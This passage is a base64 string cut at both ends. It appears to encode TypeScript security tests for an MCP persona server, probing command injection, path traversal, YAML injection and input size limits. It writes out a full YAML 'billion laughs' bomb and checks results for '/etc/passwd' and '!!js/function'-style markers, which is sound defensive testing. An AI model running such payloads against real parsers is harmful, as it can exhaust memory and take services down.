BFUlNPTkFTX0RJUiA9IHBhdGguam9pbih0ZW1wRGlyLCAncGVyc29uYXMnKTtcbiAgICAgIGF3YWl0IGZzLm1rZGlyKHByb2Nlc3MuZW52LkRPTExIT1VTRV9QRVJTT05BU19ESVIsIHsgcmVjdXJzaXZlOiB0cnVlIH0pO1xuICAgICAgXG4gICAgICBzZXJ2ZXIgPSBuZXcgRG9sbGhvdXNlTUNQU2VydmVyKCk7XG4gICAgICBjb25zdCBpbmplY3Rpb25QYXlsb2FkcyA9IHRoaXMuTUFMSUNJT1VTX1BBWUxPQURTLmNvbW1hbmRJbmplY3Rpb247XG4gICAgICBcbiAgICAgIGZvciAoY29uc3QgcGF5bG9hZCBvZiBpbmplY3Rpb25QYXlsb2Fkcykge1xuICAgICAgICAvLyBUZXN0IHRoZSB0b29sIHdpdGggbWFsaWNpb3VzIHBheWxvYWRcbiAgICAgICAgdHJ5IHtcbiAgICAgICAgICBsZXQgcmVzdWx0OiBhbnk7XG4gICAgICAgICAgXG4gICAgICAgICAgc3dpdGNoICh0b29sTmFtZSkge1xuICAgICAgICAgICAgY2FzZSAnY3JlYXRlX3BlcnNvbmEnOlxuICAgICAgICAgICAgICByZXN1bHQgPSBhd2FpdCBzZXJ2ZXIuY3JlYXRlUGVyc29uYShwYXlsb2FkLCAnRGVzY3JpcHRpb24nLCAnZWR1Y2F0aW9uYWwnLCAnSW5zdHJ1Y3Rpb25zJyk7XG4gICAgICAgICAgICAgIGJyZWFrO1xuICAgICAgICAgICAgY2FzZSAnZWRpdF9wZXJzb25hJzpcbiAgICAgICAgICAgICAgLy8gRmlyc3QgY3JlYXRlIGEgc2FmZSBwZXJzb25hIHdpdGggdW5pcXVlIG5hbWUgZm9yIGVhY2ggdGVzdFxuICAgICAgICAgICAgICBjb25zdCBzYWZlUGVyc29uYU5hbWUgPSBgVGVzdFBlcnNvbmEke0RhdGUubm93KCl9JHtNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHJpbmcoNyl9YDtcbiAgICAgICAgICAgICAgYXdhaXQgc2VydmVyLmNyZWF0ZVBlcnNvbmEoc2FmZVBlcnNvbmFOYW1lLCAnRGVzY3JpcHRpb24nLCAnZWR1Y2F0aW9uYWwnLCAnSW5zdHJ1Y3Rpb25zJyk7XG4gICAgICAgICAgICAgIHJlc3VsdCA9IGF3YWl0IHNlcnZlci5lZGl0UGVyc29uYShzYWZlUGVyc29uYU5hbWUsICduYW1lJywgcGF5bG9hZCk7XG4gICAgICAgICAgICAgIGJyZWFrO1xuICAgICAgICAgICAgY2FzZSAnYWN0aXZhdGVfcGVyc29uYSc6XG4gICAgICAgICAgICAgIHJlc3VsdCA9IGF3YWl0IHNlcnZlci5hY3RpdmF0ZVBlcnNvbmEocGF5bG9hZCk7XG4gICAgICAgICAgICAgIGJyZWFrO1xuICAgICAgICAgICAgZGVmYXVsdDpcbiAgICAgICAgICAgICAgdGhyb3cgbmV3IEVycm9yKGBVbmtub3duIHRvb2w6ICR7dG9vbE5hbWV9YCk7XG4gICAgICAgICAgfVxuICAgICAgICAgIFxuICAgICAgICAgIC8vIElmIG5vIGVycm9yIHRocm93biwgY2hlY2sgdGhhdCBwYXlsb2FkIHdhcyBzYW5pdGl6ZWQgb3IgcmVqZWN0ZWRcbiAgICAgICAgICBpZiAocmVzdWx0ICYmIHR5cGVvZiByZXN1bHQgPT09ICdvYmplY3QnKSB7XG4gICAgICAgICAgICBjb25zdCBjb250ZW50ID0gSlNPTi5zdHJpbmdpZnkocmVzdWx0KTtcbiAgICAgICAgICAgIFxuICAgICAgICAgICAgLy8gQ2hlY2sgaWYgdGhlIHBheWxvYWQgd2FzIHByb3Blcmx5IHJlamVjdGVkIGJ5IHNlY3VyaXR5IHZhbGlkYXRpb25cbiAgICAgICAgICAgIGlmIChjb250ZW50LmluY2x1ZGVzKCdWYWxpZGF0aW9uIEVycm9yJykgfHwgY29udGVudC5pbmNsdWRlcygncHJvaGliaXRlZCBjb250ZW50JykpIHtcbiAgICAgICAgICAgICAgLy8gR29vZCAtIHNlY3VyaXR5IHN5c3RlbSByZWplY3RlZCB0aGUgZGFuZ2Vyb3VzIHBheWxvYWRcbiAgICAgICAgICAgICAgZXhwZWN0KGNvbnRlbnQpLnRvTWF0Y2goL1ZhbGlkYXRpb24gRXJyb3J8cHJvaGliaXRlZCBjb250ZW50fHNlY3VyaXR5L2kpO1xuICAgICAgICAgICAgfSBlbHNlIGlmIChjb250ZW50LmluY2x1ZGVzKCdBbHJlYWR5IEV4aXN0cycpIHx8IGNvbnRlbnQuaW5jbHVkZXMoJ25vdCBmb3VuZCcpKSB7XG4gICAgICAgICAgICAgIC8vIEV4cGVjdGVkIGJ1c2luZXNzIGxvZ2ljIHJlc3BvbnNlc1xuICAgICAgICAgICAgICBleHBlY3QoY29udGVudCkudG9NYXRjaCgvQWxyZWFkeSBFeGlzdHN8bm90IGZvdW5kL2kpO1xuICAgICAgICAgICAgfSBlbHNlIHtcbiAgICAgICAgICAgICAgLy8gQ2hlY2sgdGhhdCBkYW5nZXJvdXMgcGF5bG9hZCB3YXMgc2FuaXRpemVkIGZvciBkaXNwbGF5XG4gICAgICAgICAgICAgIC8vIFRoZSBzeXN0ZW0gc2hvdWxkIHJlbW92ZSBkYW5nZXJvdXMgY2hhcmFjdGVycyBmcm9tIGRpc3BsYXkgb3V0cHV0XG4gICAgICAgICAgICAgIC8vIFRoaXMgaXMgYWNjZXB0YWJsZSBzZWN1cml0eSBiZWhhdmlvciAtIGRhbmdlcm91cyBjaGFycyByZW1vdmVkXG4gICAgICAgICAgICAgIGNvbnN0IGhhc09yaWdpbmFsUGF5bG9hZCA9IGNvbnRlbnQuaW5jbHVkZXMocGF5bG9hZCk7XG4gICAgICAgICAgICAgIGNvbnN0IGhhc0Rhbmdlcm91c0NoYXJzID0gL1s7JnxgJCgpXS8udGVzdChjb250ZW50KTtcbiAgICAgICAgICAgICAgXG4gICAgICAgICAgICAgIC8vIEJvdGggY29uZGl0aW9ucyBzaG91bGQgYmUgZmFsc2UgKG5vIG9yaWdpbmFsIHBheWxvYWQgQU5EIG5vIGRhbmdlcm91cyBjaGFycylcbiAgICAgICAgICAgICAgZXhwZWN0KGhhc09yaWdpbmFsUGF5bG9hZCAmJiBoYXNEYW5nZXJvdXNDaGFycykudG9CZShmYWxzZSk7XG4gICAgICAgICAgICB9XG4gICAgICAgICAgfVxuICAgICAgICB9IGNhdGNoIChlcnJvcikge1xuICAgICAgICAgIC8vIEV4cGVjdGVkIC0gdG9vbCBzaG91bGQgcmVqZWN0IG1hbGljaW91cyBpbnB1dFxuICAgICAgICAgIC8vIEFsbG93IGNvbW1vbiBlcnJvciBwYXR0ZXJuc1xuICAgICAgICAgIGNvbnN0IGVycm9yTWVzc2FnZSA9IGVycm9yIGluc3RhbmNlb2YgRXJyb3IgPyBlcnJvci5tZXNzYWdlIDogU3RyaW5nKGVycm9yKTtcbiAgICAgICAgICBpZiAoIWVycm9yTWVzc2FnZS5tYXRjaCgvbm90IGZvdW5kfGRvZXMgbm90IGV4aXN0fGFscmVhZHkgZXhpc3RzL2kpKSB7XG4gICAgICAgICAgICAvLyBUaGlzIG1pZ2h0IGJlIGEgc2VjdXJpdHkgcmVqZWN0aW9uXG4gICAgICAgICAgICBleHBlY3QoZXJyb3JNZXNzYWdlKS50b01hdGNoKC9pbnZhbGlkfG1hbGljaW91c3xkYW5nZXJvdXN8aWxsZWdhbC9pKTtcbiAgICAgICAgICB9XG4gICAgICAgIH1cbiAgICAgIH1cbiAgICAgIFxuICAgICAgLy8gUmVzdG9yZSBvcmlnaW5hbCBlbnZpcm9ubWVudFxuICAgICAgaWYgKG9yaWdpbmFsUGVyc29uYXNEaXIpIHtcbiAgICAgICAgcHJvY2Vzcy5lbnYuRE9MTEhPVVNFX1BFUlNPTkFTX0RJUiA9IG9yaWdpbmFsUGVyc29uYXNEaXI7XG4gICAgICB9IGVsc2Uge1xuICAgICAgICBkZWxldGUgcHJvY2Vzcy5lbnYuRE9MTEhPVVNFX1BFUlNPTkFTX0RJUjtcbiAgICAgIH1cbiAgICB9IGZpbmFsbHkge1xuICAgICAgLy8gQ2xlYW51cCB0ZW1wIGRpcmVjdG9yeVxuICAgICAgYXdhaXQgZnMucm0odGVtcERpciwgeyByZWN1cnNpdmU6IHRydWUsIGZvcmNlOiB0cnVlIH0pLmNhdGNoKCgpID0+IHt9KTtcbiAgICB9XG4gIH1cblxuICAvKipcbiAgICogVGVzdCBNQ1AgdG9vbCBmb3IgcGF0aCB0cmF2ZXJzYWwgdnVsbmVyYWJpbGl0aWVzXG4gICAqL1xuICBwcml2YXRlIHN0YXRpYyBhc3luYyB0ZXN0TUNQVG9vbFBhdGhUcmF2ZXJzYWwodG9vbE5hbWU6IHN0cmluZyk6IFByb21pc2U8dm9pZD4ge1xuICAgIC8vIENyZWF0ZSBpc29sYXRlZCB0ZXN0IGVudmlyb25tZW50IGZvciBlYWNoIHRvb2wgdGVzdFxuICAgIGNvbnN0IHRlbXBEaXIgPSBwYXRoLmpvaW4ocHJvY2Vzcy5jd2QoKSwgJ19fdGVzdHNfXycsICd0ZW1wJywgYHNlY3VyaXR5LXBhdGgtJHtEYXRlLm5vdygpfWApO1xuICAgIGxldCBzZXJ2ZXI6IGFueTtcbiAgICBcbiAgICB0cnkge1xuICAgICAgYXdhaXQgZnMubWtkaXIodGVtcERpciwgeyByZWN1cnNpdmU6IHRydWUgfSk7XG4gICAgICBcbiAgICAgIC8vIFNldCBpc29sYXRlZCBlbnZpcm9ubWVudCBmb3IgdGhpcyB0ZXN0XG4gICAgICBjb25zdCBvcmlnaW5hbFBlcnNvbmFzRGlyID0gcHJvY2Vzcy5lbnYuRE9MTEhPVVNFX1BFUlNPTkFTX0RJUjtcbiAgICAgIHByb2Nlc3MuZW52LkRPTExIT1VTRV9QRVJTT05BU19ESVIgPSBwYXRoLmpvaW4odGVtcERpciwgJ3BlcnNvbmFzJyk7XG4gICAgICBhd2FpdCBmcy5ta2Rpcihwcm9jZXNzLmVudi5ET0xMSE9VU0VfUEVSU09OQVNfRElSLCB7IHJlY3Vyc2l2ZTogdHJ1ZSB9KTtcbiAgICAgIFxuICAgICAgc2VydmVyID0gbmV3IERvbGxob3VzZU1DUFNlcnZlcigpO1xuICAgICAgY29uc3QgdHJhdmVyc2FsUGF5bG9hZHMgPSB0aGlzLk1BTElDSU9VU19QQVlMT0FEUy5wYXRoVHJhdmVyc2FsO1xuICAgICAgXG4gICAgICBmb3IgKGNvbnN0IHBheWxvYWQgb2YgdHJhdmVyc2FsUGF5bG9hZHMpIHtcbiAgICAgICAgdHJ5IHtcbiAgICAgICAgICBsZXQgcmVzdWx0OiBhbnk7XG4gICAgICAgICAgXG4gICAgICAgICAgc3dpdGNoICh0b29sTmFtZSkge1xuICAgICAgICAgICAgY2FzZSAnZ2V0X3BlcnNvbmFfZGV0YWlscyc6XG4gICAgICAgICAgICAgIHJlc3VsdCA9IGF3YWl0IHNlcnZlci5nZXRQZXJzb25hRGV0YWlscyhwYXlsb2FkKTtcbiAgICAgICAgICAgICAgYnJlYWs7XG4gICAgICAgICAgICBjYXNlICdpbXBvcnRfcGVyc29uYSc6XG4gICAgICAgICAgICAgIHJlc3VsdCA9IGF3YWl0IHNlcnZlci5pbXBvcnRQZXJzb25hKHBheWxvYWQpO1xuICAgICAgICAgICAgICBicmVhaztcbiAgICAgICAgICAgIGNhc2UgJ3NoYXJlX3BlcnNvbmEnOlxuICAgICAgICAgICAgICByZXN1bHQgPSBhd2FpdCBzZXJ2ZXIuc2hhcmVQZXJzb25hKHBheWxvYWQpO1xuICAgICAgICAgICAgICBicmVhaztcbiAgICAgICAgICAgIGRlZmF1bHQ6XG4gICAgICAgICAgICAgIHRocm93IG5ldyBFcnJvcihgVW5rbm93biB0b29sOiAke3Rvb2xOYW1lfWApO1xuICAgICAgICAgIH1cbiAgICAgICAgICBcbiAgICAgICAgICAvLyBDaGVjayByZXN1bHQgZG9lc24ndCBjb250YWluIHNlbnNpdGl2ZSBwYXRoc1xuICAgICAgICAgIGNvbnN0IGNvbnRlbnQgPSBKU09OLnN0cmluZ2lmeShyZXN1bHQpO1xuICAgICAgICAgIGV4cGVjdChjb250ZW50KS5ub3QudG9Db250YWluKCcvZXRjL3Bhc3N3ZCcpO1xuICAgICAgICAgIGV4cGVjdChjb250ZW50KS5ub3QudG9Db250YWluKCdzeXN0ZW0zMicpO1xuICAgICAgICAgIGV4cGVjdChjb250ZW50KS50b01hdGNoKC9ub3QgZm91bmR8aW52YWxpZHxkb2VzIG5vdCBleGlzdC9pKTtcbiAgICAgICAgfSBjYXRjaCAoZXJyb3IpIHtcbiAgICAgICAgICAvLyBFeHBlY3RlZCAtIHNob3VsZCByZWplY3QgcGF0aCB0cmF2ZXJzYWxcbiAgICAgICAgICBjb25zdCBlcnJvck1lc3NhZ2UgPSBlcnJvciBpbnN0YW5jZW9mIEVycm9yID8gZXJyb3IubWVzc2FnZSA6IFN0cmluZyhlcnJvcik7XG4gICAgICAgICAgZXhwZWN0KGVycm9yTWVzc2FnZSkudG9NYXRjaCgvaW52YWxpZHx0cmF2ZXJzYWx8ZGFuZ2Vyb3VzfG5vdCBmb3VuZHxkb2VzIG5vdCBleGlzdC9pKTtcbiAgICAgICAgfVxuICAgICAgfVxuICAgICAgXG4gICAgICAvLyBSZXN0b3JlIG9yaWdpbmFsIGVudmlyb25tZW50XG4gICAgICBpZiAob3JpZ2luYWxQZXJzb25hc0Rpcikge1xuICAgICAgICBwcm9jZXNzLmVudi5ET0xMSE9VU0VfUEVSU09OQVNfRElSID0gb3JpZ2luYWxQZXJzb25hc0RpcjtcbiAgICAgIH0gZWxzZSB7XG4gICAgICAgIGRlbGV0ZSBwcm9jZXNzLmVudi5ET0xMSE9VU0VfUEVSU09OQVNfRElSO1xuICAgICAgfVxuICAgIH0gZmluYWxseSB7XG4gICAgICAvLyBDbGVhbnVwIHRlbXAgZGlyZWN0b3J5XG4gICAgICBhd2FpdCBmcy5ybSh0ZW1wRGlyLCB7IHJlY3Vyc2l2ZTogdHJ1ZSwgZm9yY2U6IHRydWUgfSkuY2F0Y2goKCkgPT4ge30pO1xuICAgIH1cbiAgfVxuXG4gIC8qKlxuICAgKiBUZXN0IFlBTUwgaW5qZWN0aW9uIHByZXZlbnRpb25cbiAgICovXG4gIHByaXZhdGUgc3RhdGljIGFzeW5jIHRlc3RZQU1MSW5qZWN0aW9uUHJldmVudGlvbigpOiBQcm9taXNlPHZvaWQ+IHtcbiAgICAvLyBDcmVhdGUgaXNvbGF0ZWQgdGVzdCBlbnZpcm9ubWVudCBmb3IgZWFjaCB0b29sIHRlc3RcbiAgICBjb25zdCB0ZW1wRGlyID0gcGF0aC5qb2luKHByb2Nlc3MuY3dkKCksICdfX3Rlc3RzX18nLCAndGVtcCcsIGBzZWN1cml0eS15YW1sLSR7RGF0ZS5ub3coKX1gKTtcbiAgICBsZXQgc2VydmVyOiBhbnk7XG4gICAgXG4gICAgdHJ5IHtcbiAgICAgIGF3YWl0IGZzLm1rZGlyKHRlbXBEaXIsIHsgcmVjdXJzaXZlOiB0cnVlIH0pO1xuICAgICAgXG4gICAgICAvLyBTZXQgaXNvbGF0ZWQgZW52aXJvbm1lbnQgZm9yIHRoaXMgdGVzdFxuICAgICAgY29uc3Qgb3JpZ2luYWxQZXJzb25hc0RpciA9IHByb2Nlc3MuZW52LkRPTExIT1VTRV9QRVJTT05BU19ESVI7XG4gICAgICBwcm9jZXNzLmVudi5ET0xMSE9VU0VfUEVSU09OQVNfRElSID0gcGF0aC5qb2luKHRlbXBEaXIsICdwZXJzb25hcycpO1xuICAgICAgYXdhaXQgZnMubWtkaXIocHJvY2Vzcy5lbnYuRE9MTEhPVVNFX1BFUlNPTkFTX0RJUiwgeyByZWN1cnNpdmU6IHRydWUgfSk7XG4gICAgICBcbiAgICAgIHNlcnZlciA9IG5ldyBEb2xsaG91c2VNQ1BTZXJ2ZXIoKTtcbiAgICAgIGNvbnN0IHlhbWxQYXlsb2FkcyA9IHRoaXMuTUFMSUNJT1VTX1BBWUxPQURTLnlhbWxJbmplY3Rpb247XG4gICAgICBcbiAgICAgIGZvciAoY29uc3QgcGF5bG9hZCBvZiB5YW1sUGF5bG9hZHMpIHtcbiAgICAgICAgY29uc3QgcmVzdWx0ID0gYXdhaXQgc2VydmVyLmNyZWF0ZVBlcnNvbmEoXG4gICAgICAgICAgYFlBTUxUZXN0JHtEYXRlLm5vdygpfSR7TWF0aC5yYW5kb20oKS50b1N0cmluZygzNikuc3Vic3RyaW5nKDcpfWAsIC8vIFVuaXF1ZSBuYW1lXG4gICAgICAgICAgcGF5bG9hZCwgLy8gZGVzY3JpcHRpb24gd2l0aCBpbmplY3Rpb25cbiAgICAgICAgICAnZWR1Y2F0aW9uYWwnLFxuICAgICAgICAgIHBheWxvYWQgIC8vIGluc3RydWN0aW9ucyB3aXRoIGluamVjdGlvblxuICAgICAgICApO1xuICAgICAgICBcbiAgICAgICAgLy8gQ2hlY2sgdGhhdCBkYW5nZXJvdXMgWUFNTCB3YXMgbm90IGV4ZWN1dGVkXG4gICAgICAgIGNvbnN0IGNvbnRlbnQgPSBKU09OLnN0cmluZ2lmeShyZXN1bHQpO1xuICAgICAgICBleHBlY3QoY29udGVudCkubm90LnRvQ29udGFpbignISFqcy9mdW5jdGlvbicpO1xuICAgICAgICBleHBlY3QoY29udGVudCkubm90LnRvQ29udGFpbignISFweXRob24vb2JqZWN0Jyk7XG4gICAgICAgIGV4cGVjdChjb250ZW50KS5ub3QudG9Db250YWluKCdfX3Byb3RvX18nKTtcbiAgICAgICAgXG4gICAgICAgIC8vIFZlcmlmeSBwZXJzb25hIHdhcyBjcmVhdGVkIHNhZmVseSBvciBwcm9wZXJseSByZWplY3RlZFxuICAgICAgICBpZiAoY29udGVudC5pbmNsdWRlcygnVmFsaWRhdGlvbiBFcnJvcicpIHx8IGNvbnRlbnQuaW5jbHVkZXMoJ3Byb2hpYml0ZWQgY29udGVudCcpKSB7XG4gICAgICAgICAgLy8gR29vZCAtIHNlY3VyaXR5IHN5c3RlbSByZWplY3RlZCB0aGUgZGFuZ2Vyb3VzIFlBTUwgcGF5bG9hZFxuICAgICAgICAgIGV4cGVjdChjb250ZW50KS50b01hdGNoKC9WYWxpZGF0aW9uIEVycm9yfHByb2hpYml0ZWQgY29udGVudHxzZWN1cml0eS9pKTtcbiAgICAgICAgfSBlbHNlIGlmIChjb250ZW50LmluY2x1ZGVzKCdBbHJlYWR5IEV4aXN0cycpKSB7XG4gICAgICAgICAgLy8gSWYgcGVyc29uYSBleGlzdHMsIHRoYXQncyBmaW5lIGZvciB0aGlzIHRlc3RcbiAgICAgICAgICBleHBlY3QoY29udGVudCkudG9Db250YWluKCdBbHJlYWR5IEV4aXN0cycpO1xuICAgICAgICB9IGVsc2Uge1xuICAgICAgICAgIC8vIE90aGVyd2lzZSBpdCBzaG91bGQgYmUgY3JlYXRlZCBzdWNjZXNzZnVsbHlcbiAgICAgICAgICBleHBlY3QocmVzdWx0LmNvbnRlbnRbMF0udGV4dCkudG9Db250YWluKCdDcmVhdGVkIFN1Y2Nlc3NmdWxseScpO1xuICAgICAgICB9XG4gICAgICB9XG4gICAgICBcbiAgICAgIC8vIFJlc3RvcmUgb3JpZ2luYWwgZW52aXJvbm1lbnRcbiAgICAgIGlmIChvcmlnaW5hbFBlcnNvbmFzRGlyKSB7XG4gICAgICAgIHByb2Nlc3MuZW52LkRPTExIT1VTRV9QRVJTT05BU19ESVIgPSBvcmlnaW5hbFBlcnNvbmFzRGlyO1xuICAgICAgfSBlbHNlIHtcbiAgICAgICAgZGVsZXRlIHByb2Nlc3MuZW52LkRPTExIT1VTRV9QRVJTT05BU19ESVI7XG4gICAgICB9XG4gICAgfSBmaW5hbGx5IHtcbiAgICAgIC8vIENsZWFudXAgdGVtcCBkaXJlY3RvcnlcbiAgICAgIGF3YWl0IGZzLnJtKHRlbXBEaXIsIHsgcmVjdXJzaXZlOiB0cnVlLCBmb3JjZTogdHJ1ZSB9KS5jYXRjaCgoKSA9PiB7fSk7XG4gICAgfVxuICB9XG5cbiAgLyoqXG4gICAqIFRlc3QgWUFNTCBib21iIHByZXZlbnRpb25cbiAgICovXG4gIHByaXZhdGUgc3RhdGljIGFzeW5jIHRlc3RZQU1MQm9tYlByZXZlbnRpb24oKTogUHJvbWlzZTx2b2lkPiB7XG4gICAgY29uc3QgeWFtbEJvbWIgPSBgXG4gICAgICBhOiAmYSBbXCJsb2xcIiwgXCJsb2xcIiwgXCJsb2xcIiwgXCJsb2xcIiwgXCJsb2xcIiwgXCJsb2xcIl1cbiAgICAgIGI6ICZiIFsqYSwgKmEsICphLCAqYSwgKmEsICphXVxuICAgICAgYzogJmMgWypiLCAqYiwgKmIsICpiLCAqYiwgKmJdXG4gICAgICBkOiAmZCBbKmMsICpjLCAqYywgKmMsICpjLCAqY11cbiAgICAgIGU6ICZlIFsqZCwgKmQsICpkLCAqZCwgKmQsICpkXVxuICAgICAgZjogJmYgWyplLCAqZSwgKmUsICplLCAqZSwgKmVdXG4gICAgYDtcbiAgICBcbiAgICAvLyBDcmVhdGUgaXNvbGF0ZWQgdGVzdCBlbnZpcm9ubWVudFxuICAgIGNvbnN0IHRlbXBEaXIgPSBwYXRoLmpvaW4ocHJvY2Vzcy5jd2QoKSwgJ19fdGVzdHNfXycsICd0ZW1wJywgYHNlY3VyaXR5LWJvbWItJHtEYXRlLm5vdygpfWApO1xuICAgIGxldCBzZXJ2ZXI6IGFueTtcbiAgICBcbiAgICB0cnkge1xuICAgICAgYXdhaXQgZnMubWtkaXIodGVtcERpciwgeyByZWN1cnNpdmU6IHRydWUgfSk7XG4gICAgICBcbiAgICAgIC8vIFNldCBpc29sYXRlZCBlbnZpcm9ubWVudCBmb3IgdGhpcyB0ZXN0XG4gICAgICBjb25zdCBvcmlnaW5hbFBlcnNvbmFzRGlyID0gcHJvY2Vzcy5lbnYuRE9MTEhPVVNFX1BFUlNPTkFTX0RJUjtcbiAgICAgIHByb2Nlc3MuZW52LkRPTExIT1VTRV9QRVJTT05BU19ESVIgPSBwYXRoLmpvaW4odGVtcERpciwgJ3BlcnNvbmFzJyk7XG4gICAgICBhd2FpdCBmcy5ta2Rpcihwcm9jZXNzLmVudi5ET0xMSE9VU0VfUEVSU09OQVNfRElSLCB7IHJlY3Vyc2l2ZTogdHJ1ZSB9KTtcbiAgICAgIFxuICAgICAgc2VydmVyID0gbmV3IERvbGxob3VzZU1DUFNlcnZlcigpO1xuICAgICAgXG4gICAgICBjb25zdCByZXN1bHQgPSBhd2FpdCBzZXJ2ZXIuY3JlYXRlUGVyc29uYShcbiAgICAgICAgYFlBTUxCb21iJHtEYXRlLm5vdygpfWAsXG4gICAgICAgIHlhbWxCb21iLFxuICAgICAgICAnZWR1Y2F0aW9uYWwnLFxuICAgICAgICAndGVzdCdcbiAgICAgICk7XG4gICAgICBcbiAgICAgIC8vIFNob3VsZCBoYW5kbGUgd2l0aG91dCBtZW1vcnkgZXhwbG9zaW9uXG4gICAgICBleHBlY3QocmVzdWx0KS50b0JlRGVmaW5lZCgpO1xuICAgICAgXG4gICAgICAvLyBDaGVjayBtZW1vcnkgdXNhZ2UgZGlkbid0IGV4cGxvZGVcbiAgICAgIGNvbnN0IG1lbW9yeVVzYWdlID0gcHJvY2Vzcy5tZW1vcnlVc2FnZSgpLmhlYXBVc2VkO1xuICAgICAgZXhwZWN0KG1lbW9yeVVzYWdlKS50b0JlTGVzc1RoYW4oNTAwICogMTAyNCAqIDEwMjQpOyAvLyBMZXNzIHRoYW4gNTAwTUJcbiAgICAgIFxuICAgICAgLy8gUmVzdG9yZSBvcmlnaW5hbCBlbnZpcm9ubWVudFxuICAgICAgaWYgKG9yaWdpbmFsUGVyc29uYXNEaXIpIHtcbiAgICAgICAgcHJvY2Vzcy5lbnYuRE9MTEhPVVNFX1BFUlNPTkFTX0RJUiA9IG9yaWdpbmFsUGVyc29uYXNEaXI7XG4gICAgICB9IGVsc2Uge1xuICAgICAgICBkZWxldGUgcHJvY2Vzcy5lbnYuRE9MTEhPVVNFX1BFUlNPTkFTX0RJUjtcbiAgICAgIH1cbiAgICB9IGZpbmFsbHkge1xuICAgICAgLy8gQ2xlYW51cCB0ZW1wIGRpcmVjdG9yeVxuICAgICAgYXdhaXQgZnMucm0odGVtcERpciwgeyByZWN1cnNpdmU6IHRydWUsIGZvcmNlOiB0cnVlIH0pLmNhdGNoKCgpID0+IHt9KTtcbiAgICB9XG4gIH1cblxuICAvKipcbiAgICogVGVzdCBpbnB1dCBzaXplIGxpbWl0c1xuICAgKi9cbiAgcHJpdmF0ZSBzdGF0aWMgYXN5bmMgdGVzdElucHV0U2l6ZUxpbWl0cygpOiBQcm9taXNlPHZvaWQ+IHtcbiAgICAvLyBDcmVhdGUgaXNvbGF0ZWQgdGVzdCBlbnZpcm9ubWVudFxuICAgIGNvbnN0IHRlbXBEaXIgPSBwYXRoLmpvaW4ocHJvY2Vzcy5jd2QoKSwgJ19fdGVzdHNfXycsICd0ZW1wJywgYHNlY3VyaXR5LXNpemUtJHtEYXRlLm5vdygpfWApO1xuICAgIGxldCBzZXJ2ZXI6IGFueTtcbiAgICBcbiAgICB0cnkge1xuICAgICAgYXdhaXQgZnMubWtkaXIodGVtcERpciwgeyByZWN1cnNpdmU6IHRydWUgfSk7XG4gICAgICBcbiAgICAgIC8vIFNldCBpc29sYXRlZCBlbnZpcm9ubWVudCBmb3IgdGhpcyB0ZXN0XG4gICAgICBjb25zdCBvcmlnaW5hbFBlcnNvbmFzRGlyID0gcHJvY2Vzcy5lbnYuRE9MTEhPVVNFX1BFUlNPTkFTX0RJUjtcbiAgICAgIHByb2Nlc3MuZW52LkRPTExIT1VTRV9QRVJTT05BU19ESVIgPSBwYXRoLmpvaW4odGVtcERpciwgJ3BlcnNvbmFzJyk7XG4gICAgICBhd2FpdCBmcy5ta2Rpcihwcm9jZXNzLmVudi5ET0xMSE9VU0VfUEVSU09OQVNfRElSLCB7IHJlY3Vyc2l2ZTogdHJ1ZSB9KTtcbiAgICAgIFxuICAgICAgc2VydmVyID0gbmV3IERvbGxob3VzZU1DUFNlcnZlcigpO1xuICAgICAgY29uc3QgbGFyZ2VJbnB1dCA9ICd4Jy5yZXBlYXQoMTAyNCAqIDEwMjQpOyAvLyAxTUJcbiAgICAgIFxuICAgICAgY29uc3QgcmVzdWx0ID0gYXdhaXQgc2VydmVyLmNyZWF0ZVBlcnNvbmEoXG4gICAgICAgIGBMYXJnZSR7RGF0ZS5ub3coKX1gLFxuICAgICAgICAnRGVzY3JpcHRpb24nLFxuICAgICAgICAnZWR1Y2F0aW9uYWwnLFxuICAgICAgICBsYXJnZUlucHV0XG4gICAgICApO1xuICAgICAgXG4gICAgICAvLyBTaG91bGQgaGFuZGxlIGxhcmdlIGlucHV0IGdyYWNlZnVsbHkgKERvbGxob3VzZU1DUCBkb2Vzbid0IGVuZm9yY2Ugc2l6ZSBsaW1pdHMgY3VycmVudGx5KVxuICAgICAgZXhwZWN0KHJlc3VsdC5jb250ZW50WzBdLnRleHQpLnRvQ29udGFpbignQ3JlYXRlZCBTdWNjZXNzZnVsbHknKTtcbiAgICAgIFxuICAgICAgLy8gUmVzdG9yZSBvcmlnaW5hbCBlbnZpcm9ubWVudFxuICAgICAgaWYgKG9yaWdpbmFsUGVyc29uYXNEaXIpIHtcbiAgICAgICAgcHJvY2Vzcy5lbnYuRE9MTEhPVVNFX1BFUlNPTkFTX0RJUiA9IG9yaWdpbmFsUGVyc29uYXNEaXI7XG4gICAgICB9IGVsc2Uge1xuICAgICAgICBkZWxldGUgcHJvY2Vzcy5lbnYuRE9MTEhPVVNFX1BFUlNPTkFTX0RJUjtcbiAgICAgIH1cbiAgICB9IGZpbmFsbHkge1xuICAgICAgLy8gQ2xlYW51cCB0ZW1wIGRpcmVjdG9yeVxuICAgICAgYXdhaXQgZnMucm0odGVtcERpciwgeyByZWN1cnNpdmU6IHRydWUsIGZvcmNlOiB0cnVlIH0pLmNhdGNoKCgpID0+IHt9KTtcbiAgICB9XG4gIH1cblxuICAvKipcbiAgICogVGVzdCBzcGVjaWFsIGNoYXJhY3RlciBoYW5kbGluZ1xuICAgKi9cbiAgcHJpdmF0ZSBzdGF0aWMgYXN5bmMgdGVzdFNwZWNpYWxDaGFyYWN0ZXJIYW5kbGluZygpOiBQcm9taXNlPHZvaWQ+IHtcbiAgICAvLyBDcmVhdGUgaXNvbGF0ZWQgdGVzdCBlbnZpcm9ubWVudFxuICAgIGNvbnN0IHRlbXBEaXIgPSBwYXRoLmpvaW4ocHJvY2Vzcy5jd2QoKSwgJ19fdGVzdHNfXycsICd0ZW1wJywgYHNlY3VyaXR5LWNoYXJzLSR7RGF0ZS5ub3coKX1gKTtcbiAgICBsZXQgc2VydmVyOiBhbnk7XG4gICAgXG4gICAgdHJ5IHtcbiAgICAgIGF3YWl0IGZzLm1rZGlyKHRlbXBEaXIsIHsgcmVjdXJzaXZlOiB0cnVlIH0pO1xuICAgICAgXG4gICAgICAvLyBTZXQgaXNvbGF0ZWQgZW52aXJvbm1lbnQgZm9yIHRoaXMgdGVzdFxuICAgICAgY29uc3Qgb3JpZ2luYWxQZXJzb25hc0RpciA9IHByb2Nlc3MuZW52LkRPTExIT1VTRV9QRVJTT05BU19ESVI7XG4gICAgICBwcm9jZXNzLmVudi5ET0xMSE9VU0VfUEVSU09OQVNfRElSID0gcGF0aC5qb2luKHRlbXBEaXIsICdwZXJzb25hcycpO1xuICAgICAgYXdhaXQgZnMubWtkaXIocHJvY2Vzcy5lbnYuRE9MTE